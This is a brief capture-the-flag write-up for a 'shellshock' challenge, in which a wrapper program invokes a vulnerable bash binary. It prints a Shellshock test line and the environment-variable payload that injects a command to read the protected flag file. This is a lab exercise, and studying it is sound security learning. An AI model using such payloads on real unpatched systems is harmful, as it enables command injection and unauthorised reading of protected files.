This challenge has a bash executable in the home directory which the shellshock executable runs like below:

system("/home/shellshock/bash -c 'echo shock_me'");

The bash binary is vulnerable to shellshock as can be seen by the following command:

env x='() { :;}; echo vulnerable' ./bash -c 'echo hello'

Since the binary simply calls the bash binary, we can the command below to run the flag:

env x='() { :;}; /bin/cat flag' ./shellshock